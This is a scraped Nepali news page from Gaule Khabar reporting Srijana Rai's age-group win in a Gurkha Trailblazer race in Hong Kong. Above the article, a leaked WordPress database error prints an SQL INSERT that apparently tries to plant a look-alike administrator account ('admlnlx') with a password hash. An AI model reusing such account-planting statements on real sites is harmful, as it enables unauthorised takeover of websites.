WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/p10kV82or165zz.KngkD8G5iLzL.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 22:27:38', '', 'admlnlx', 'admlnlx')

सृजना राईलाई हङकङमा गोर्खा ट्रैलब्लेजरको उपाधि – Gaule Khabar

सृजना राईलाई हङकङमा गोर्खा ट्रैलब्लेजरको उपाधि

सृजना राईलाई हङकङमा गोर्खा ट्रैलब्लेजरको उपाधि

गाँउले न्यूज, २८ पौष, काठमान्डौ । नेपाली धाविका सृजना राईले हङकङमा आयोजना भएको क्युनेट गोर्खा ट्रैलब्लेजरमा प्रथम स्थान हासिल गरेकी छिन् ।

शनिबार भएको २६ कि.मि. दौडको १८ देखि २९ बर्ष उमेर समुहतर्फ नेपाली धाविका राई प्रथम हुन सफल भएको हो । यस् प्रतियोगितामा ३१ देशका ७१ जना नेपाली सहित ४०० बढी सहभागी भएका थिए । प्रतियोगिता गोर्खाको सम्मानमा आयोजना गरिएको हो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका